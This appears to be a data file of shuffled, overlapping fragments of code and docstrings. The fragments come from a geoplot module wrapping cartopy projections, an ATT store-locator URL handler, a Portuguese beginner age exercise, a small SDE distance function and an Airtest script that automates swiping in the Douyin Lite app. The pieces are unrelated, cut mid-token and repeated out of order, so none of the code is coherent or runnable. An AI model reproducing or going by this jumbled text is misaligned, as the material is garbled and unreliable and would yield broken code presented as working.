for name in ('AlbersEqualArea', 'AzimuthalEquidistant', 'LambertConformal', 'Orthographic', 'Stereographic',", "**self.args}) def _as_mpl_axes(self): \"\"\" When ``matplotlib`` is provided a projection", "automatically (using the function defined immediately above). Since we control", "above). Since we control what ``geoplot`` does at execution, we", "of individual projections' load procedures. Parameters ---------- df : GeoDataFrame", "It's possible to get around this by using ``cartopy.crs`` objects", "__init__(self, **kwargs): \"\"\"Save parameters that initialize Cartopy CRSs.\"\"\" self.args =", "and passes them to the ``_generic_load`` method here. We then", "\"\"\" Generate instances of ``cartopy.crs``.*name* where *name* matches the instance's", "to our output ``cartopy.crs`` instance. Returns ------- crs : ``cartopy.crs``", "containing subplots, the \"overall\" projection must be pre-loaded. It's possible", "turn execute these functions to get defaults for our ``df``", "of this funny twice-instantiation loading in the first place. centerings:", "called with empty `df` and `centerings`. \"\"\" def __init__(self, **kwargs):", "meta-method which abstracts the internals of individual projections' load procedures.", "not important: it suffices to know that every ``cartopy`` coordinate", "a ``geoplot`` function, the loading and centering of the data", "empty `df` and `centerings`. \"\"\" def __init__(self, **kwargs): \"\"\"Save parameters", "know that every ``cartopy`` coordinate reference system object has one.", "('PlateCarree', 'LambertCylindrical', 'Mercator', 'Miller', 'Mollweide', 'Robinson', 'Sinusoidal', 'InterruptedGoodeHomolosine', 'Geostationary', 'NorthPolarStereo',", "pass a ``geoplot.crs`` object without having first called ``load``: most", "abstracts the internals of individual projections' load procedures. Parameters ----------", "used as parameters to the ``projection`` parameter of all front-end", "a CRS that centers by latitude.\"\"\" filter_ = {'central_latitude'} PlateCarree,\\", "gpd class Base: # TODO: RotatedPole \"\"\" Generate instances of", "whose appropriate instance variables have been set to reasonable defaults", "we are forced to pass a ``geoplot.crs`` object without having", "around this by using ``cartopy.crs`` objects instead, but this is", "each of the projection wrapper classes defined here in turn", "tuple( type(name, (LongitudeCentering,), {}) for name in ('PlateCarree', 'LambertCylindrical', 'Mercator',", "classes defined here in turn selects the functions from this", "wrappers on ``cartopy.crs`` objects meant to be used as parameters", "\"\"\"Save parameters that initialize Cartopy CRSs.\"\"\" self.args = kwargs def", "defined here in turn selects the functions from this list", "to know that every ``cartopy`` coordinate reference system object has", "{'central_longitude'} class LatitudeCentering(Filtering): \"\"\"For a CRS that centers by latitude.\"\"\"", "``cartopy.crs`` mirror, and calls that function's ``_as_mpl_axes`` instead. Parameters ----------", "for our ``df`` and pass them off to our output", "first place. centerings: dict A dictionary containing names and centering", "tuple( type(name, (Base,), {}) for name in ('AlbersEqualArea', 'AzimuthalEquidistant', 'LambertConformal',", "be pre-loaded. It's possible to get around this by using", "for key, value in centerings.items() if key in self.filter_} )", "in which the user does not already provide them; which", "set to reasonable defaults wherever not already provided by the", "reference system classes, wrappers on ``cartopy.crs`` objects meant to be", "the projection wrapper classes defined here in turn selects the", "here in turn selects the functions from this list relevent", "while the North Pole Stereo projection has only a ``central_longitude``", "and returns the result of executing ``_as_mpl_axes`` on that object", "in which we are forced to pass a ``geoplot.crs`` object", "``projection`` keyword argument, it expects to get something with a", "centerings): \"\"\" A meta-method which abstracts the internals of individual", "center of the plot, while the North Pole Stereo projection", "also use cases outside of our control in which we", "``_as_mpl_axes`` instead. Parameters ---------- proj : geoplot.crs projection instance The", "and `centerings`. \"\"\" def __init__(self, **kwargs): \"\"\"Save parameters that initialize", "load(self, df, centerings): \"\"\"Call `load` method with `centerings` filtered to", "a ``geoplot.crs`` object without having first called ``load``: most prominently,", "individual projections' load procedures. Parameters ---------- df : GeoDataFrame The", "in turn execute these functions to get defaults for our", "procedures. Parameters ---------- df : GeoDataFrame The GeoDataFrame which has", "of the data occurs automatically (using the function defined immediately", "then in turn execute these functions to get defaults for", "LambertAzimuthalEqualArea,\\ UTM,\\ OSGB,\\ EuroPP,\\ OSNI = tuple( type(name, (Base,), {})", "``geoplot`` outputs. For the list of Cartopy CRS objects this", "projection wrapper classes defined here in turn selects the functions", "in self.filter_} ) class LongitudeCentering(Filtering): \"\"\"Form a CRS that centers", "'Robinson', 'Sinusoidal', 'InterruptedGoodeHomolosine', 'Geostationary', 'NorthPolarStereo', 'SouthPolarStereo') ) Gnomonic = type('Gnomonic',", "as parameters to the ``projection`` parameter of all front-end ``geoplot``", "instance parameter, implying that latitude is fixed (as indeed it", "function's ``_as_mpl_axes`` instead. Parameters ---------- proj : geoplot.crs projection instance", "proj = self.load(gpd.GeoDataFrame(), dict()) return proj._as_mpl_axes() class Filtering(Base): \"\"\"CRS that", "\"\"\"Call `load` method with `centerings` filtered to keys in `self.filter_`.\"\"\"", "instance's class name. Parameters ---------- `load` : Return a Cartopy", "the result of calling cartopy's ``_as_mpl_axes`` for `self.load` called with", "that centers by latitude.\"\"\" filter_ = {'central_latitude'} PlateCarree,\\ LambertCylindrical,\\ Mercator,\\", "projection has only a ``central_longitude`` instance parameter, implying that latitude", "{'central_latitude'} PlateCarree,\\ LambertCylindrical,\\ Mercator,\\ Miller,\\ Mollweide,\\ Robinson,\\ Sinusoidal,\\ InterruptedGoodeHomolosine,\\ Geostationary,\\", "list of Cartopy CRS objects this module derives from, refer", "for a vanilla version of its ``cartopy.crs`` mirror, and calls", "is provided in each of the ``geoplot`` top-level plot functions;", "via a ``projection`` keyword argument, it expects to get something", "to pass a ``geoplot.crs`` object without having first called ``load``:", "Parameters ---------- proj : geoplot.crs projection instance The instance in", "and ``central_latitude`` instance parameter, which together control the center of", "'NorthPolarStereo', 'SouthPolarStereo') ) Gnomonic = type('Gnomonic', (LatitudeCentering,), {}) AlbersEqualArea,\\ AzimuthalEquidistant,\\", "control in which we are forced to pass a ``geoplot.crs``", "what this method does, exactly, are not important: it suffices", "Gnomonic = type('Gnomonic', (LatitudeCentering,), {}) AlbersEqualArea,\\ AzimuthalEquidistant,\\ LambertConformal,\\ Orthographic,\\ Stereographic,\\", "plotter at the top level. This data is needed to", "Return the result of calling cartopy's ``_as_mpl_axes`` for `self.load` called", "place. centerings: dict A dictionary containing names and centering methods.", "AlbersEqualArea,\\ AzimuthalEquidistant,\\ LambertConformal,\\ Orthographic,\\ Stereographic,\\ TransverseMercator,\\ LambertAzimuthalEqualArea,\\ UTM,\\ OSGB,\\ EuroPP,\\", "Geostationary,\\ NorthPolarStereo,\\ SouthPolarStereo = tuple( type(name, (LongitudeCentering,), {}) for name", "cartopy's ``_as_mpl_axes`` for `self.load` called with empty `df` and `centerings`.", "result of calling cartopy's ``_as_mpl_axes`` for `self.load` called with empty", "cases in which the user does not already provide them;", "are also use cases outside of our control in which", "our control in which we are forced to pass a", "centered on the North Pole!). A top-level centerings method is", "does not already provide them; which is, incidentally, the reason", "does at execution, we gracefully integrate this two-step procedure into", "called by ``matplotlib``, it silently swaps itself out for a", "get defaults for our ``df`` and pass them off to", "the plot, while the North Pole Stereo projection has only", "instance. Returns ------- crs : ``cartopy.crs`` object instance Returns a", "``geoplot.crs`` crs object to a ``geoplot`` function, the loading and", "(self, in the method body). Returns ------- Mutates into a", "refer to http://scitools.org.uk/cartopy/docs/latest/crs/projections.html. \"\"\" import cartopy.crs as ccrs import geopandas", "for `self.load` called with empty `df` and `centerings`. \"\"\" def", "itself out for a vanilla version of its ``cartopy.crs`` mirror,", "the \"overall\" projection must be pre-loaded. It's possible to get", "selects the functions from this list relevent to this particular", "projection via a ``projection`` keyword argument, it expects to get", "Pole Stereo projection has only a ``central_longitude`` instance parameter, implying" ]
[ "ne_corner = \"{0},{1}\".format(lat + 1, lon + 1) return self.config[kwargs['provider']]['url'].format(lat=lat,", "get_url(self, **kwargs): lat = float(kwargs.get('lat')) lon = float(kwargs.get('lon')) sw_corner =", "StoresHandler class ATTStoresHandler(StoresHandler): def handle_request(self, **kwargs): kwargs.update({'provider': 'att'}) return super(ATTStoresHandler,", "**kwargs): kwargs.update({'provider': 'att'}) return super(ATTStoresHandler, self).handle_request(**kwargs) def get_url(self, **kwargs): lat", "float(kwargs.get('lat')) lon = float(kwargs.get('lon')) sw_corner = \"{0},{1}\".format(lat - 1, lon", "= \"{0},{1}\".format(lat + 1, lon + 1) return self.config[kwargs['provider']]['url'].format(lat=lat, lon=lon,", "def get_url(self, **kwargs): lat = float(kwargs.get('lat')) lon = float(kwargs.get('lon')) sw_corner", "1) ne_corner = \"{0},{1}\".format(lat + 1, lon + 1) return", "\"{0},{1}\".format(lat + 1, lon + 1) return self.config[kwargs['provider']]['url'].format(lat=lat, lon=lon, sw_corner=sw_corner,", "+ 1, lon + 1) return self.config[kwargs['provider']]['url'].format(lat=lat, lon=lon, sw_corner=sw_corner, ne_corner=ne_corner)", "sw_corner = \"{0},{1}\".format(lat - 1, lon - 1) ne_corner =", "- 1) ne_corner = \"{0},{1}\".format(lat + 1, lon + 1)", "def handle_request(self, **kwargs): kwargs.update({'provider': 'att'}) return super(ATTStoresHandler, self).handle_request(**kwargs) def get_url(self,", "lon - 1) ne_corner = \"{0},{1}\".format(lat + 1, lon +", "'att'}) return super(ATTStoresHandler, self).handle_request(**kwargs) def get_url(self, **kwargs): lat = float(kwargs.get('lat'))", "handle_request(self, **kwargs): kwargs.update({'provider': 'att'}) return super(ATTStoresHandler, self).handle_request(**kwargs) def get_url(self, **kwargs):", "lon = float(kwargs.get('lon')) sw_corner = \"{0},{1}\".format(lat - 1, lon -", "float(kwargs.get('lon')) sw_corner = \"{0},{1}\".format(lat - 1, lon - 1) ne_corner", "import StoresHandler class ATTStoresHandler(StoresHandler): def handle_request(self, **kwargs): kwargs.update({'provider': 'att'}) return", "ATTStoresHandler(StoresHandler): def handle_request(self, **kwargs): kwargs.update({'provider': 'att'}) return super(ATTStoresHandler, self).handle_request(**kwargs) def", "from .default_handler import StoresHandler class ATTStoresHandler(StoresHandler): def handle_request(self, **kwargs): kwargs.update({'provider':", "lat = float(kwargs.get('lat')) lon = float(kwargs.get('lon')) sw_corner = \"{0},{1}\".format(lat -", "kwargs.update({'provider': 'att'}) return super(ATTStoresHandler, self).handle_request(**kwargs) def get_url(self, **kwargs): lat =", "1, lon - 1) ne_corner = \"{0},{1}\".format(lat + 1, lon", "class ATTStoresHandler(StoresHandler): def handle_request(self, **kwargs): kwargs.update({'provider': 'att'}) return super(ATTStoresHandler, self).handle_request(**kwargs)", "= float(kwargs.get('lat')) lon = float(kwargs.get('lon')) sw_corner = \"{0},{1}\".format(lat - 1,", "= \"{0},{1}\".format(lat - 1, lon - 1) ne_corner = \"{0},{1}\".format(lat", "return super(ATTStoresHandler, self).handle_request(**kwargs) def get_url(self, **kwargs): lat = float(kwargs.get('lat')) lon", "**kwargs): lat = float(kwargs.get('lat')) lon = float(kwargs.get('lon')) sw_corner = \"{0},{1}\".format(lat", "self).handle_request(**kwargs) def get_url(self, **kwargs): lat = float(kwargs.get('lat')) lon = float(kwargs.get('lon'))", "\"{0},{1}\".format(lat - 1, lon - 1) ne_corner = \"{0},{1}\".format(lat +", ".default_handler import StoresHandler class ATTStoresHandler(StoresHandler): def handle_request(self, **kwargs): kwargs.update({'provider': 'att'})", "super(ATTStoresHandler, self).handle_request(**kwargs) def get_url(self, **kwargs): lat = float(kwargs.get('lat')) lon =", "= float(kwargs.get('lon')) sw_corner = \"{0},{1}\".format(lat - 1, lon - 1)", "- 1, lon - 1) ne_corner = \"{0},{1}\".format(lat + 1," ]
[ "o ano de nascimento de 7 pessoas e mostre quantas", "e quantas ainda não for c in range(1,8): p=int(input('Qual o", "e mostre quantas ja atingiram a maioridade e quantas ainda", "else: print('A pessoa numero {} não é maior de idade!'.format(c))", "ano de nascimento de 7 pessoas e mostre quantas ja", "nascimento? ')) a=2021-p if a>= 18: print('A pessoa numero {}", "7 pessoas e mostre quantas ja atingiram a maioridade e", "for c in range(1,8): p=int(input('Qual o ano de seu nascimento?", "idade'.format(c)) else: print('A pessoa numero {} não é maior de", "pessoas e mostre quantas ja atingiram a maioridade e quantas", "já é maior de idade'.format(c)) else: print('A pessoa numero {}", "mostre quantas ja atingiram a maioridade e quantas ainda não", "#Leia o ano de nascimento de 7 pessoas e mostre", "{} já é maior de idade'.format(c)) else: print('A pessoa numero", "')) a=2021-p if a>= 18: print('A pessoa numero {} já", "print('A pessoa numero {} já é maior de idade'.format(c)) else:", "ja atingiram a maioridade e quantas ainda não for c", "seu nascimento? ')) a=2021-p if a>= 18: print('A pessoa numero", "de 7 pessoas e mostre quantas ja atingiram a maioridade", "c in range(1,8): p=int(input('Qual o ano de seu nascimento? '))", "maioridade e quantas ainda não for c in range(1,8): p=int(input('Qual", "a=2021-p if a>= 18: print('A pessoa numero {} já é", "de nascimento de 7 pessoas e mostre quantas ja atingiram", "pessoa numero {} já é maior de idade'.format(c)) else: print('A", "if a>= 18: print('A pessoa numero {} já é maior", "in range(1,8): p=int(input('Qual o ano de seu nascimento? ')) a=2021-p", "p=int(input('Qual o ano de seu nascimento? ')) a=2021-p if a>=", "18: print('A pessoa numero {} já é maior de idade'.format(c))", "o ano de seu nascimento? ')) a=2021-p if a>= 18:", "atingiram a maioridade e quantas ainda não for c in", "ano de seu nascimento? ')) a=2021-p if a>= 18: print('A", "range(1,8): p=int(input('Qual o ano de seu nascimento? ')) a=2021-p if", "não for c in range(1,8): p=int(input('Qual o ano de seu", "a maioridade e quantas ainda não for c in range(1,8):", "quantas ainda não for c in range(1,8): p=int(input('Qual o ano", "ainda não for c in range(1,8): p=int(input('Qual o ano de", "quantas ja atingiram a maioridade e quantas ainda não for", "é maior de idade'.format(c)) else: print('A pessoa numero {} não", "nascimento de 7 pessoas e mostre quantas ja atingiram a", "de seu nascimento? ')) a=2021-p if a>= 18: print('A pessoa", "de idade'.format(c)) else: print('A pessoa numero {} não é maior", "a>= 18: print('A pessoa numero {} já é maior de", "numero {} já é maior de idade'.format(c)) else: print('A pessoa", "maior de idade'.format(c)) else: print('A pessoa numero {} não é" ]
[ "= [] for j in front: if i == j:", "\"\"\" Provide function to calculate SDE distance @auth: <NAME> @date:", "[(values1[i], values2[i])] shifted_list = [] for j in front: if", "j in front: if i == j: continue else: shifted_list.append((min(values1[i],", "i in front: shifted_dict[i] = [(values1[i], values2[i])] shifted_list = []", "== j: continue else: shifted_list.append((min(values1[i], values1[j]), min(values2[i], values2[j]))) shifted_dict[i].append(shifted_list) return", "to calculate SDE distance @auth: <NAME> @date: 2021/05/05 \"\"\" def", "calculate SDE distance @auth: <NAME> @date: 2021/05/05 \"\"\" def SDE(front,", "def SDE(front, values1, values2): shifted_dict = {} for i in", "<NAME> @date: 2021/05/05 \"\"\" def SDE(front, values1, values2): shifted_dict =", "shifted_dict = {} for i in front: shifted_dict[i] = [(values1[i],", "2021/05/05 \"\"\" def SDE(front, values1, values2): shifted_dict = {} for", "coding: utf-8 -*- \"\"\" Provide function to calculate SDE distance", "SDE distance @auth: <NAME> @date: 2021/05/05 \"\"\" def SDE(front, values1,", "python3 # -*- coding: utf-8 -*- \"\"\" Provide function to", "for i in front: shifted_dict[i] = [(values1[i], values2[i])] shifted_list =", "in front: shifted_dict[i] = [(values1[i], values2[i])] shifted_list = [] for", "utf-8 -*- \"\"\" Provide function to calculate SDE distance @auth:", "values1, values2): shifted_dict = {} for i in front: shifted_dict[i]", "shifted_list = [] for j in front: if i ==", "function to calculate SDE distance @auth: <NAME> @date: 2021/05/05 \"\"\"", "front: shifted_dict[i] = [(values1[i], values2[i])] shifted_list = [] for j", "{} for i in front: shifted_dict[i] = [(values1[i], values2[i])] shifted_list", "= {} for i in front: shifted_dict[i] = [(values1[i], values2[i])]", "if i == j: continue else: shifted_list.append((min(values1[i], values1[j]), min(values2[i], values2[j])))", "Provide function to calculate SDE distance @auth: <NAME> @date: 2021/05/05", "i == j: continue else: shifted_list.append((min(values1[i], values1[j]), min(values2[i], values2[j]))) shifted_dict[i].append(shifted_list)", "for j in front: if i == j: continue else:", "front: if i == j: continue else: shifted_list.append((min(values1[i], values1[j]), min(values2[i],", "SDE(front, values1, values2): shifted_dict = {} for i in front:", "# -*- coding: utf-8 -*- \"\"\" Provide function to calculate", "@date: 2021/05/05 \"\"\" def SDE(front, values1, values2): shifted_dict = {}", "\"\"\" def SDE(front, values1, values2): shifted_dict = {} for i", "= [(values1[i], values2[i])] shifted_list = [] for j in front:", "-*- \"\"\" Provide function to calculate SDE distance @auth: <NAME>", "#!/usr/bin/env python3 # -*- coding: utf-8 -*- \"\"\" Provide function", "values2): shifted_dict = {} for i in front: shifted_dict[i] =", "[] for j in front: if i == j: continue", "distance @auth: <NAME> @date: 2021/05/05 \"\"\" def SDE(front, values1, values2):", "values2[i])] shifted_list = [] for j in front: if i", "@auth: <NAME> @date: 2021/05/05 \"\"\" def SDE(front, values1, values2): shifted_dict", "j: continue else: shifted_list.append((min(values1[i], values1[j]), min(values2[i], values2[j]))) shifted_dict[i].append(shifted_list) return shifted_dict", "in front: if i == j: continue else: shifted_list.append((min(values1[i], values1[j]),", "shifted_dict[i] = [(values1[i], values2[i])] shifted_list = [] for j in", "-*- coding: utf-8 -*- \"\"\" Provide function to calculate SDE" ]
[ "print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") wake() # 启动手机 start_app(\"com.ss.android.ugc.aweme.lite\") hua = 0", "* if not cli_setup(): auto_setup(__file__, logdir=True, devices=[ \"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\", ]) #", "resolution=(1079, 2340))) sleep(5) swipe((484, 1711),(531,709)) print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") # generate", "1: hua += 1 滑动方向 += 1 if hua ==", "import * from airtest.cli.parser import cli_setup # from douyin import", "-*- encoding=utf8 -*- __author__ = \"pscly\" from airtest.core.api import *", "cli_setup(): auto_setup(__file__, logdir=True, devices=[ \"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\", ]) # script content print(\"start...\")", "-*- __author__ = \"pscly\" from airtest.core.api import * from airtest.cli.parser", "not cli_setup(): auto_setup(__file__, logdir=True, devices=[ \"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\", ]) # script content", "import cli_setup # from douyin import * if not cli_setup():", "print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") # generate html report # from airtest.report.report import simple_report", "\"pscly\" from airtest.core.api import * from airtest.cli.parser import cli_setup #", "devices=[ \"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\", ]) # script content print(\"start...\") print(\"冲冲冲!\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\")", "print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") wake() # 启动手机 start_app(\"com.ss.android.ugc.aweme.lite\") hua = 0 滑动方向 =", "= 0 滑动方向 = 0 while 1: hua += 1", "from airtest.cli.parser import cli_setup # from douyin import * if", "0 while 1: hua += 1 滑动方向 += 1 if", "1 if hua == 10: touch(Template(r\"tpl1607564875731.png\", record_pos=(-0.404, -0.67), resolution=(1079, 2340)))", "= \"pscly\" from airtest.core.api import * from airtest.cli.parser import cli_setup", "\"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\", ]) # script content print(\"start...\") print(\"冲冲冲!\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\")", "content print(\"start...\") print(\"冲冲冲!\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") wake() # 启动手机 start_app(\"com.ss.android.ugc.aweme.lite\")", "swipe((484, 1711),(531,709)) print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") # generate html report #", "from douyin import * if not cli_setup(): auto_setup(__file__, logdir=True, devices=[", "print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") # generate html report # from airtest.report.report", "cli_setup # from douyin import * if not cli_setup(): auto_setup(__file__,", "<filename>a1.py # -*- encoding=utf8 -*- __author__ = \"pscly\" from airtest.core.api", "2340))) sleep(5) swipe((484, 1711),(531,709)) print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") # generate html", "# 启动手机 start_app(\"com.ss.android.ugc.aweme.lite\") hua = 0 滑动方向 = 0 while", "__author__ = \"pscly\" from airtest.core.api import * from airtest.cli.parser import", "douyin import * if not cli_setup(): auto_setup(__file__, logdir=True, devices=[ \"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\",", "]) # script content print(\"start...\") print(\"冲冲冲!\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") wake()", "print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") wake() # 启动手机 start_app(\"com.ss.android.ugc.aweme.lite\") hua = 0 滑动方向", "0 滑动方向 = 0 while 1: hua += 1 滑动方向", "== 10: touch(Template(r\"tpl1607564875731.png\", record_pos=(-0.404, -0.67), resolution=(1079, 2340))) sleep(5) swipe((484, 1711),(531,709))", "print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") # generate html report # from airtest.report.report import", "if not cli_setup(): auto_setup(__file__, logdir=True, devices=[ \"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\", ]) # script", "print(\"start...\") print(\"冲冲冲!\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") wake() # 启动手机 start_app(\"com.ss.android.ugc.aweme.lite\") hua", "10: touch(Template(r\"tpl1607564875731.png\", record_pos=(-0.404, -0.67), resolution=(1079, 2340))) sleep(5) swipe((484, 1711),(531,709)) print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\")", "generate html report # from airtest.report.report import simple_report # simple_report(__file__,", "html report # from airtest.report.report import simple_report # simple_report(__file__, logpath=True)", "touch(Template(r\"tpl1607564875731.png\", record_pos=(-0.404, -0.67), resolution=(1079, 2340))) sleep(5) swipe((484, 1711),(531,709)) print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\")", "+= 1 if hua == 10: touch(Template(r\"tpl1607564875731.png\", record_pos=(-0.404, -0.67), resolution=(1079,", "1 滑动方向 += 1 if hua == 10: touch(Template(r\"tpl1607564875731.png\", record_pos=(-0.404,", "hua == 10: touch(Template(r\"tpl1607564875731.png\", record_pos=(-0.404, -0.67), resolution=(1079, 2340))) sleep(5) swipe((484,", "# script content print(\"start...\") print(\"冲冲冲!\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") wake() #", "= 0 while 1: hua += 1 滑动方向 += 1", "if hua == 10: touch(Template(r\"tpl1607564875731.png\", record_pos=(-0.404, -0.67), resolution=(1079, 2340))) sleep(5)", "start_app(\"com.ss.android.ugc.aweme.lite\") hua = 0 滑动方向 = 0 while 1: hua", "encoding=utf8 -*- __author__ = \"pscly\" from airtest.core.api import * from", "hua += 1 滑动方向 += 1 if hua == 10:", "logdir=True, devices=[ \"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\", ]) # script content print(\"start...\") print(\"冲冲冲!\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\")", "# -*- encoding=utf8 -*- __author__ = \"pscly\" from airtest.core.api import", "hua = 0 滑动方向 = 0 while 1: hua +=", "滑动方向 += 1 if hua == 10: touch(Template(r\"tpl1607564875731.png\", record_pos=(-0.404, -0.67),", "airtest.core.api import * from airtest.cli.parser import cli_setup # from douyin", "滑动方向 = 0 while 1: hua += 1 滑动方向 +=", "from airtest.core.api import * from airtest.cli.parser import cli_setup # from", "启动手机 start_app(\"com.ss.android.ugc.aweme.lite\") hua = 0 滑动方向 = 0 while 1:", 